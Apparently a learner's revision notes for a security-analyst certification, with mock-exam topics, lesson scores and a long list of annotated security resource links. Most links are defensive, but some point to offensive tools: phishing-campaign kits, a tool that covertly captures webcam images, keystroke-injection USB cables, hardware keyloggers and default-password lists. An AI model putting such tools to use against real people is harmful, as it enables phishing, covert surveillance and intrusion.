topic 13b id mal activity through analysis got q right, but log types system vs app vs event vs security ![[mock q 1.png]] B topic 2c threat hunting concepts isolated network hunting ![[mock q 2.png]] A topic 2c threat hunting concepts ![[mock q 3.png]] A,B,C topic 14b recommending controls to mitigate application attacks Using a diverse range of data can help prevent data poisoning attacks by making it more difficult to manipulate the inputs to modify the results. output validatio is made up - input validation DUH ![[mock q 4.png]] D topic 5b ![[mock q 5.png]] correcct, but lucky topic14b contorols to mitigate successful application attacks ![[mock q 6.png]] topic 12a analysing web vulns ZAP is a opensource web appp scanner -can gen report ## Review wrong answers - [x] topic 1b control types and methods operational controls - [x] topic 2c threat hunting concepts isolated network hunting - [x] topic 3a Reviewing system and network architecture concepts sase - e2e encryption regardless of location Virutalisation security benefits - [x] topic5b understanding vuln scanning methods agent vs agentless software analysis - static, dynamic, reverse eng - [x] topic5c special considerations segmented network device fingerprinting - [x] topic6b vuln contenxt considerations prioritisation topic7b vuln reporting and outcomes CVSS importance - type of vuln irrelevant propietary software topic 8b performing incident response activities cant follow incident repsonse process unique method topic09c anaylse inc response activites mean time to respond effectiveness 10b attack methodology frameworks ^ 11a network attack indicators beaconing 14a explore secure software development practices prevent cross site scripting Lesson 1: Understanding Vulnerability Response, Handling, and Management 7 of 7 86% Lesson 2: Exploring Threat Intelligence and Threat Hunting Concepts 12 of 12 75% Lesson 3: Explaining Important System and Network Architecture Concepts 6 of 6 67% Lesson 4: Understanding Process Improvement in Security Operations 2 of 2 100% Lesson 5: Implementing Vulnerability Scanning Methods 7 of 7 43% Lesson 6: Performing Vulnerability Analysis 5 of 5 60% Lesson 7: Communicating Vulnerability Information 3 of 3 33% Lesson 8: Explaining Incident Response Activities 12 of 12 83% Lesson 9: Demonstrating Incident Response Communication 6 of 6 83% Lesson 10: Applying Tools to Identify Malicious Activity 7 of 7 86% Lesson 11: Analyzing Potentially Malicious Activity 3 of 3 67% Lesson 12: Understanding Application Vulnerability Assessment 2 of 2 50% Lesson 13: Exploring Scripting Tools and Analysis Concepts 7 of 7 100% Lesson 14: Understanding Application Security and Attack Mitigation Best Practices 8 of 8 75% # Misc additional links from training provider portswigger labs https://portswigger.net/web-security/all-labs# Hacksplaining [Lessons](https://www.hacksplaining.com/lessons) phishing [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) and Gophish [https://getgophish.com/](https://getgophish.com/). The Social-Engineer Toolkit offers many capabilities, such as creating a legitimate-looking web page or creating malicious attachments, whereas Gophish is more focused on providing a user-friendly graphical interface and tools for managing campaigns. [https://surbl.org/](https://surbl.org/) Intelligence and reputation services covering spam and abuse sites, phishing, malware, and cracked sites. [https://dnstwist.it/](https://dnstwist.it/) Phishing domain scanner. Wondering if threat actors created phishing domains to masquerade as an online service or property? Search the original domain or brand name etc. [https://github.com/0xDanielLopez/phishing_kits](https://github.com/0xDanielLopez/phishing_kits) Exposing phishing kits seen from [phishunt.io](http://phishunt.io/) [https://github.com/hasanfirnas/symbiote](https://github.com/hasanfirnas/symbiote) Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. By requesting camera permission on the victim's device, this script can take pictures covertly. [https://easydmarc.com/tools/phishing-url](https://easydmarc.com/tools/phishing-url) Phishing Link (URL) & email checker [https://github.com/mitchellkrogza/Phishing.Database](https://github.com/mitchellkrogza/Phishing.Database) Phishing Domains, URLs websites and threats database. [https://isitphishing.org/](https://isitphishing.org/) Type what you want to test for phishing [https://www.ncsc.gov.uk/collection/phishing-scams](https://www.ncsc.gov.uk/collection/phishing-scams) [https://openphish.com/phishing_activity.html](https://openphish.com/phishing_activity.html%C2%A0) ; [https://phishing.army/](https://phishing.army/) blocklists [https://phishcheck.me/](https://phishcheck.me/) Find out what's lurking behind that URL. [https://phishunt.io/](https://phishunt.io/) Active websites that are suspicious of being phishing. [https://phishing-initiative.eu/contrib/](https://phishing-initiative.eu/contrib/) Verify or report a website. [https://www.phishlabs.com/blog/ -](https://www.phishlabs.com/blog/%C2%A0-) threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list. [https://phishstats.info/](https://phishstats.info/) [https://phishtank.org/index.php](https://phishtank.org/index.php) PhishTank is a collaborative clearing house for data and information about phishing on the Internet. Alternative site [https://www.phishtank.com/](https://www.phishtank.com/) [https://www.phishlabs.com/blog/](https://www.phishlabs.com/blog/) - threat intelligence news and updates. Detailed reports, accessible after signing up for the mailing list. [https://www.phishtank.com/](https://www.phishtank.com/%C2%A0) ; [https://www.phishtool.com/](https://www.phishtool.com/) [https://threatcop.com/phishing-url-checker](https://threatcop.com/phishing-url-checker) [Should I Block It?](https://shouldiblockit.com/) https://www.nirsoft.net/ https://start.me/p/ydqwxP/rss-feeds https://youtu.be/W8HG3sLsp8Y [https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/](https://www.tindie.com/products/aprbrother/cactus-whid-wifi-hid-injector-usb-rubberducky/) •[https://www.tindie.com/products/aprbrother/evil-crow-cable/](https://www.tindie.com/products/aprbrother/evil-crow-cable/) •[https://www.wallofsheep.com/pages/juice (juice](https://www.wallofsheep.com/pages/juice%C2%A0\(juice) jacking) •[https://zsecurity.org/product/badusb-keystroke-injection-cable/](https://zsecurity.org/product/badusb-keystroke-injection-cable/) •[https://twitter.com/androidmalware2/status/1679110865331576833 Bruteforcing](https://twitter.com/androidmalware2/status/1679110865331576833%C2%A0Bruteforcing) PIN protection of popular app using $3 ATTINY85 •[https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/](https://securityintelligence.com/articles/juice-jacking-is-it-real-or-media-hype/) •[https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9](https://dev.to/lpjune/make-a-rubber-ducky-for-3-with-digispark-2fp9) •[http://www.airdrivewifi.com/](http://www.airdrivewifi.com/) •[https://counterespionage.com/malicious-usb-cables/](https://counterespionage.com/malicious-usb-cables/) •[https://dstike.com/products/dstike-wifi-deauther-mini](https://dstike.com/products/dstike-wifi-deauther-mini) •[https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0](https://www.ebay.co.uk/sch/i.html?_from=R40&_trksid=p2380057.m570.l1313&_nkw=digispark&_sacat=0) if link does not work then search for digispark on eBay •[https://en.rattibha.com/thread/1827621860193763785](https://en.rattibha.com/thread/1827621860193763785) SPY GADGETS •[https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4](https://www.fabtolab.com/do-it-yourself/Hacking-Spying-Surveillance?page=4) •[https://flipperzero.one/](https://flipperzero.one/) •[https://greatscottgadgets.com/hackrf/](https://greatscottgadgets.com/hackrf/) •[https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device](https://www.hackers-arise.com/post/using-multiblue-to-control-any-bluetooth-mobile-device) •[https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910](https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910) •[https://hak5.org/](https://hak5.org/) •[https://www.keelog.com/](https://www.keelog.com/) •[https://www.keydemon.com/en/](https://www.keydemon.com/en/) •[https://www.keyghost.com/](https://www.keyghost.com/) •[https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi](https://lotevia.com/products/universal-remote-control-replicator?twclid=2-5zvo6k3bjmxju9xxaulhrzkbi) •[https://www.mobile-hacker.com/](https://www.mobile-hacker.com/) •[https://samy.pl/magspoof/](https://samy.pl/magspoof/) •[https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea](https://shop.hak5.org/collections/mischief-gadgets-homepage/products/omg-plug?variant=39464643788913&redirect_mongo_id=61f743187cd5c600186ff8eb&utm_source=Springbot&utm_medium=Email&utm_campaign=61f743187cd5c600186ff8ea) •[https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/](https://www.spycraft.co.uk/spy-equipment/gsm-spy-cable/) •[https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable](https://spyscape.com/article/hide-data-in-plain-sight-a-usb-drive-inside-a-usb-charger-cable) [https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf](https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf) [https://start.me/p/Wp1kpe/socmint](https://start.me/p/Wp1kpe/socmint) [https://start.me/p/RMKeQv/search-social-media](https://start.me/p/RMKeQv/search-social-media) [https://start.me/p/4K0DXg/social-media](https://start.me/p/4K0DXg/social-media) [https://start.me/p/b5MG5r/social-media-intelligence-socmint](https://start.me/p/b5MG5r/social-media-intelligence-socmint) [https://start.me/p/z4Lb6M/social-toolkit](https://start.me/p/z4Lb6M/social-toolkit) [https://start.me/p/ADr4qn/05-socmint](https://start.me/p/ADr4qn/05-socmint) [ https://cirt.net/passwords Default](https://cirt.net/passwords%C2%A0Default) Passwords [https://www.routerpasswords.com/ Default](https://www.routerpasswords.com/%C2%A0Default) passwords [https://codefinder.org/](https://codefinder.org/) Reposearch [https://www.copyscape.com/](https://www.copyscape.com/) [https://github.com/google/codesearch](https://github.com/google/codesearch) [https://hackertarget.com/reverse-analytics-search/](https://hackertarget.com/reverse-analytics-search/) [https://nerdydata.com/](https://nerdydata.com/) [https://publicwww.com/](https://publicwww.com/) [https://searchcode.com/](https://searchcode.com/) [https://snipplr.com/](https://snipplr.com/) [https://www.webfinery.com/search](https://www.webfinery.com/search) [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA%C2%A0) ; [www.elevenpaths.com](http://www.elevenpaths.com/) – FOCA an on-line hidden/meta data locator for a variety of file types [https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca](https://cybersecuritycloud.telefonicatech.com/en/innovation-labs/innovation-technologies/foca) also check out [https://github.com/ElevenPaths/FOCA](https://github.com/ElevenPaths/FOCA) FOCA (Fingerprinting Organisations with Collected Archives) is a tool written by ElevenPaths that can be used to scan, analyse, extract and classify information from remote web servers and their hidden information. [https://jimpl.com/](https://jimpl.com/) Online EXIF data viewer. Uncover hidden metadata from your photos. Find when and where the picture was taken. Remove EXIF data from the image to protect your personal info. [https://metashieldclean-up.tu.com/](https://metashieldclean-up.tu.com/) [https://www.extractmetadata.com/](https://www.extractmetadata.com/) - an on-line hidden/meta data locator for a variety of file types [https://start.me/p/6rqQbo/security-news](https://start.me/p/6rqQbo/security-news) [https://start.me/p/ydqwxP/rss-feeds](https://start.me/p/ydqwxP/rss-feeds) [https://start.me/p/wMrA5z/cyber-threat-intelligence](https://start.me/p/wMrA5z/cyber-threat-intelligence) [https://start.me/p/OmOrJb/threat-hunting](https://start.me/p/OmOrJb/threat-hunting) [https://start.me/p/aN5jX8/malware-analysis](https://start.me/p/aN5jX8/malware-analysis) Whois Whois was affected by GDPR [https://d09r.github.io/assay-url-inspection-tools/](https://d09r.github.io/assay-url-inspection-tools/) [https://inteltechniques.com/tools/Domain.html](https://inteltechniques.com/tools/Domain.html) [https://www.godaddy.com/en-uk/whois](https://www.godaddy.com/en-uk/whois) [https://gwhois.org/](https://gwhois.org/) [https://iplogger.org/whois/](https://iplogger.org/whois/) [https://lookup.icann.org/en](https://lookup.icann.org/en) [https://osint.hippie.cat/](https://osint.hippie.cat/) Select domain [https://osint.sh/whoishistory/](https://osint.sh/whoishistory/) [https://ping.eu/](https://ping.eu/) Online Ping, Traceroute, DNS lookup, WHOIS, Port check, Reverse lookup, Proxy checker, Bandwidth meter, Network calculator, Network mask calculator, Country by IP, Unit converter [https://www.reversewhois.io/](https://www.reversewhois.io/) [https://www.ripe.net/](https://www.ripe.net/%C2%A0) ; [https://start.me/p/ek2p4x/internetrecherche-2-0](https://start.me/p/ek2p4x/internetrecherche-2-0) (IP WHOIS~) [http://www.tcpiputils.com/tools#domain](http://www.tcpiputils.com/tools#domain%C2%A0) ; [https://viewdns.info/](https://viewdns.info/) [https://www.whois.com/](https://www.whois.com/) [https://whois.icann.org/en/](https://whois.icann.org/en/) [https://www.whoxy.com/ whoxy.com](https://www.whoxy.com/%C2%A0whoxy.com) ([whoxy.com/qa.com](http://whoxy.com/qa.com)) [https://whois.domaintools.com/](https://whois.domaintools.com/) [https://whoisology.com/](https://whoisology.com/) [https://www.yougetsignal.com/tools/whois-lookup/](https://www.yougetsignal.com/tools/whois-lookup/) [https://who.is/](https://who.is/) [https://www.whois.com/whois/](https://www.whois.com/whois/) [https://whois.domaintools.com/qa.com](https://whois.domaintools.com/qa.com) (change the end for target) Sandbox Joe Sandbox - [https://www.joesandbox.com/](https://www.joesandbox.com/) & Cuckoo Sandbox - [https://cuckoo.cert.ee/](https://cuckoo.cert.ee/) [https://github.com/CYB3RMX/Qu1cksc0pe](https://github.com/CYB3RMX/Qu1cksc0pe) All in one Malware analysis tool [https://urlscan.io/](https://urlscan.io/) [https://www.malwarebytes.com/](https://www.malwarebytes.com/) [https://www.hybrid-analysis.com/](https://www.hybrid-analysis.com/) [https://www.virustotal.com/gui/home/upload](https://www.virustotal.com/gui/home/upload) [https://any.run/](https://any.run/) [https://malwareanalysis.tools/](https://malwareanalysis.tools/) [https://malpedia.caad.fkie.fraunhofer.de/families](https://malpedia.caad.fkie.fraunhofer.de/families) Malware Families [https://maltiverse.com/trial](https://maltiverse.com/trial) [https://socradar.io/labs/ioc-radar/](https://socradar.io/labs/ioc-radar/) [https://tria.ge/](https://tria.ge/) Triage, also known as the Triage Sandbox, is an advanced malware sandboxing solution initially created by Hatching. It provides users with the ability to execute malware samples within a secure and isolated environment, enabling the analysis of their actions and evaluation of their potential risks. [https://start.me/p/m6aeXo/cybersecurity-ctfs-tools](https://start.me/p/m6aeXo/cybersecurity-ctfs-tools) [https://start.me/p/X25q7l/threat-informed-defense-ecosystem](https://start.me/p/X25q7l/threat-informed-defense-ecosystem) [https://start.me/p/m6bBNv/triage-investigations-ir](https://start.me/p/m6bBNv/triage-investigations-ir) [https://virusscan.jotti.org/en](https://virusscan.jotti.org/en) [https://www.inetsim.org/](https://www.inetsim.org/) INetSim is a software suite for simulating common internet services in a lab environment, e.g. for analysing the network behaviour of unknown malware samples. Domain tools DNS [https://dnsdumpster.com/](https://dnsdumpster.com/) [https://www.robtex.com/](https://www.robtex.com/) [https://threatcrowd.org/ This](https://threatcrowd.org/%C2%A0This) service provides a unique view of the domains associated with your target. [https://web-check.as93.net/](https://web-check.as93.net/) [https://informationlaundromat.com/](https://informationlaundromat.com/) [https://urlscan.io/](https://urlscan.io/) [https://subgraph.com/vega/](https://subgraph.com/vega/) recon OSINT Framework/Inteltechniques – a website directory of data discovery and gathering tools for almost any kind of source or platform. [https://osintframework.com/](https://osintframework.com/) or [https://inteltechniques.com/tools/index.html](https://inteltechniques.com/tools/index.html) Spiderfoot - Automates OSINT for threat intelligence and mapping your attack surface. [https://github.com/smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) & [https://www.spiderfoot.net/attack-surface-monitoring/](https://www.spiderfoot.net/attack-surface-monitoring/) Google Dorks – OSINT data gathering method using clever Google search queries with advanced arguments. [https://pentest-tools.com/information-gathering/google-hacking https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/](https://pentest-tools.com/information-gathering/google-hacking%C2%A0https://www.sans.org/posters/google-hacking-and-defense-cheat-sheet/) [Shodan.io](http://shodan.io/) – a search engine for online devices/IOT and a way to get insights into any weaknesses they may have. [https://www.shodan.io/](https://www.shodan.io/) [https://censys.com/](https://censys.com/) [https://www.zoomeye.org/](https://www.zoomeye.org/) - advertised as China’s first cyberspace search engine, constantly updated, and developed with new features. Maltego – an OSINT tool for gathering information and bringing it all together for graphical correlation analysis. [https://www.maltego.com/](https://www.maltego.com/) Metasploit – a powerful penetration testing tool that can find network vulnerabilities and even be used to exploit them. [https://www.metasploit.com/](https://www.metasploit.com/) Recon-ng – an open-source web reconnaissance tool developed in Python and continues to grow as developers contribute to its capabilities. [https://www.kali.org/tools/recon-ng/](https://www.kali.org/tools/recon-ng/) Aircrack-ng – a Wi-Fi network security testing and cracking tool that can be used both defensively and offensively to find compromised networks. [https://www.aircrack-ng.org/](https://www.aircrack-ng.org/) Burpsuite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. [https://www.kali.org/tools/burpsuite/](https://www.kali.org/tools/burpsuite/) [^1]: